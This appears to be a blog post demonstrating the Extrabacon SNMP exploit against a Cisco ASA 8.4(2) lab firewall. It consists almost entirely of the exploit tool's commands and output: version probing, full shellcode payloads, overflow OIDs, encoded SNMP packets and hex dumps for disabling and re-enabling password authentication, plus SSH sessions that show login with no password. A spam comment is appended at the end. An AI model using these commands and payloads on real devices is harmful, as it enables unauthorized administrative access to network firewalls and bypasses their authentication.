# Extrabacon (EXBA) exploit


Normal ssh connection

# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: cisco
asa> enable
Password: cisco
asa# exit

Checking exploit support

# python extrabacon_1.1.0.1.py info -t asa:161 -c cisco
[+] Executing:  extrabacon_1.1.0.1.py info -t asa:161 -c cisco
[+] probing target via snmp
[+] Connecting to asa:161
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[0L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.3.0']>
   |   |  value     = <ASN1_TIME_TICKS[363400L]>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.5.0']>
   |   |  value     = <ASN1_STRING['asa.lab.net']>

[+] firewall uptime is 363400 time ticks, or 1:00:34

[+] firewall name is asa.lab.net

[+] target is running asa842, which is supported
Data stored in key file  : asa842
Data stored in self.vinfo: ASA842

Launching the exploit (disabling passwords)

# python extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-disable
[+] Executing:  extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-disable
Data stored in self.vinfo: ASA842
[+] generating exploit for exec mode pass-disable
[+] using shellcode in ./versions
[+] importing version-specific shellcode shellcode_asa842
[+] building payload for mode pass-disable
appended PMCHECK_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3
appended AAAADMINAUTH_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3
[+] random SNMP request-id 80055950
[+] fixing offset to payload 49
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.224.1.0.0.4.49.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.25.71.20.9.139.124.36.20.139.7.255.224.144
payload (133): bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3c3
EXBA msg (369): 3082016d0201010405636973636fa582015f020404c58e8e0201000201013082014f30819106072b060102010101048185bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3c33081b80681b32b060104010909836b010303010105095f8138437b7a812d3581258125812581258103816c048109042481098165810381454831814031815b813310318176813f812e812a812a812a81018177812581258125812560810b81042481600100000431817f8150618143811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811019471409810b7c2414810b07817f816081100500
[+] Connecting to asa:161
[+] packet 1 of 1
[+] 0000   30 82 01 6D 02 01 01 04  05 63 69 73 63 6F A5 82   0..m.....cisco..
[+] 0010   01 5F 02 04 04 C5 8E 8E  02 01 00 02 01 01 30 82   ._............0.
[+] 0020   01 4F 30 81 91 06 07 2B  06 01 02 01 01 01 04 81   .O0....+........
[+] 0030   85 BF A5 A5 A5 A5 B8 D8  A5 A5 A5 31 F8 BB A5 25   ...........1...%
[+] 0040   F6 AC 31 FB B9 A5 B5 A5  A5 31 F9 BA A2 A5 A5 A5   ..1......1......
[+] 0050   31 FA CD 80 EB 14 BF F0  8F 53 09 31 C9 B1 04 FC   1........S.1....
[+] 0060   F3 A4 E9 0C 00 00 00 5E  EB EC E8 F8 FF FF FF 31   .......^.......1
[+] 0070   C0 40 C3 BF A5 A5 A5 A5  B8 D8 A5 A5 A5 31 F8 BB   .@...........1..
[+] 0080   A5 B5 AD AD 31 FB B9 A5  B5 A5 A5 31 F9 BA A2 A5   ....1......1....
[+] 0090   A5 A5 31 FA CD 80 EB 14  BF E0 13 08 08 31 C9 B1   ..1..........1..
[+] 00a0   04 FC F3 A4 E9 0C 00 00  00 5E EB EC E8 F8 FF FF   .........^......
[+] 00b0   FF 31 C0 40 C3 C3 30 81  B8 06 81 B3 2B 06 01 04   .1.@..0.....+...
[+] 00c0   01 09 09 83 6B 01 03 03  01 01 05 09 5F 81 38 43   ....k......._.8C
[+] 00d0   7B 7A 81 2D 35 81 25 81  25 81 25 81 25 81 03 81   {z.-5.%.%.%.%...
[+] 00e0   6C 04 81 09 04 24 81 09  81 65 81 03 81 45 48 31   l....$...e...EH1
[+] 00f0   81 40 31 81 5B 81 33 10  31 81 76 81 3F 81 2E 81   .@1.[.3.1.v.?...
[+] 0100   2A 81 2A 81 2A 81 01 81  77 81 25 81 25 81 25 81   *.*.*...w.%.%.%.
[+] 0110   25 60 81 0B 81 04 24 81  60 01 00 00 04 31 81 7F   %`....$.`....1..
[+] 0120   81 50 61 81 43 81 10 81  10 81 10 81 10 81 10 81   .Pa.C...........
[+] 0130   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0140   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0150   10 81 10 81 10 81 10 81  10 81 10 81 10 19 47 14   ..............G.
[+] 0160   09 81 0B 7C 24 14 81 0B  07 81 7F 81 60 81 10 05   ...|$.......`...
[+] 0170   00                                                 .
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[80055950L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.4.1.99.12.36.1.1.1.116.114.97.112.104.111.115.116.46.99.105.115.99.111.46.49.57.50.46.49.54.56.46.49.46.51.51.46.50']>
   |   |  value     = <ASN1_STRING['']>
[+] received SNMP id 80055950, matches random id sent, likely success
[+] clean return detected

Ssh connection with password disabled

# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: <enter>
asa> enable
Password: <enter>
asa# exit

Launching the exploit (re-enabling passwords)

# python extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-enable
[+] Executing:  extrabacon_1.1.0.1.py exec -k WD9Xgq -t asa:161 -c cisco --mode pass-enable
Data stored in self.vinfo: ASA842
[+] generating exploit for exec mode pass-enable
[+] using shellcode in ./versions
[+] importing version-specific shellcode shellcode_asa842
[+] building payload for mode pass-enable
appended PMCHECK_ENABLE payload eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80
appended AAAADMINAUTH_ENABLE payload eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80
[+] random SNMP request-id 425184577
[+] fixing offset to payload 49
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.224.1.0.0.4.49.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.25.71.20.9.139.124.36.20.139.7.255.224.144
payload (133): eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80c3
EXBA msg (369): 3082016d0201010405636973636fa582015f02041957cd410201000201013082014f30819106072b060102010101048185eb14bff08f530931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa0a5a5a531facd80eb14bfe013080831c9b104fcf3a4e92f0000005eebece8f8ffffff5589e557bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa0a5a5a531facd80c33081b80681b32b060104010909836b010303010105095f8138437b7a812d3581258125812581258103816c048109042481098165810381454831814031815b813310318176813f812e812a812a812a81018177812581258125812560810b81042481600100000431817f8150618143811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811019471409810b7c2414810b07817f816081100500
[+] Connecting to asa:161
[+] packet 1 of 1
[+] 0000   30 82 01 6D 02 01 01 04  05 63 69 73 63 6F A5 82   0..m.....cisco..
[+] 0010   01 5F 02 04 19 57 CD 41  02 01 00 02 01 01 30 82   ._...W.A......0.
[+] 0020   01 4F 30 81 91 06 07 2B  06 01 02 01 01 01 04 81   .O0....+........
[+] 0030   85 EB 14 BF F0 8F 53 09  31 C9 B1 04 FC F3 A4 E9   ......S.1.......
[+] 0040   2F 00 00 00 5E EB EC E8  F8 FF FF FF 55 31 C0 89   /...^.......U1..
[+] 0050   BF A5 A5 A5 A5 B8 D8 A5  A5 A5 31 F8 BB A5 25 F6   ..........1...%.
[+] 0060   AC 31 FB B9 A5 B5 A5 A5  31 F9 BA A0 A5 A5 A5 31   .1......1......1
[+] 0070   FA CD 80 EB 14 BF E0 13  08 08 31 C9 B1 04 FC F3   ..........1.....
[+] 0080   A4 E9 2F 00 00 00 5E EB  EC E8 F8 FF FF FF 55 89   ../...^.......U.
[+] 0090   E5 57 BF A5 A5 A5 A5 B8  D8 A5 A5 A5 31 F8 BB A5   .W..........1...
[+] 00a0   B5 AD AD 31 FB B9 A5 B5  A5 A5 31 F9 BA A0 A5 A5   ...1......1.....
[+] 00b0   A5 31 FA CD 80 C3 30 81  B8 06 81 B3 2B 06 01 04   .1....0.....+...
[+] 00c0   01 09 09 83 6B 01 03 03  01 01 05 09 5F 81 38 43   ....k......._.8C
[+] 00d0   7B 7A 81 2D 35 81 25 81  25 81 25 81 25 81 03 81   {z.-5.%.%.%.%...
[+] 00e0   6C 04 81 09 04 24 81 09  81 65 81 03 81 45 48 31   l....$...e...EH1
[+] 00f0   81 40 31 81 5B 81 33 10  31 81 76 81 3F 81 2E 81   .@1.[.3.1.v.?...
[+] 0100   2A 81 2A 81 2A 81 01 81  77 81 25 81 25 81 25 81   *.*.*...w.%.%.%.
[+] 0110   25 60 81 0B 81 04 24 81  60 01 00 00 04 31 81 7F   %`....$.`....1..
[+] 0120   81 50 61 81 43 81 10 81  10 81 10 81 10 81 10 81   .Pa.C...........
[+] 0130   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0140   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0150   10 81 10 81 10 81 10 81  10 81 10 81 10 19 47 14   ..............G.
[+] 0160   09 81 0B 7C 24 14 81 0B  07 81 7F 81 60 81 10 05   ...|$.......`...
[+] 0170   00                                                 .
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['cisco']>
  \PDU       \
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[425184577L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  \varbindlist\
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.4.1.99.12.36.1.1.1.116.114.97.112.104.111.115.116.46.99.105.115.99.111.46.49.57.50.46.49.54.56.46.49.46.51.51.46.50']>
   |   |  value     = <ASN1_STRING['']>
[+] received SNMP id 425184577, matches random id sent, likely success
[+] clean return detected

Normal ssh connection

# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 admin@asa
admin@asa's password: <enter>
Permission denied, please try again.
admin@asa's password:

References

https://blog.silentsignal.eu/2016/08/25/bake-your-own-extrabacon/

1 comment:

Blogger said...

If you want your ex-girlfriend or ex-boyfriend to come crawling back to you on their knees (even if they're dating somebody else now) you must watch this video
right away...

(VIDEO) Get your ex back with TEXT messages?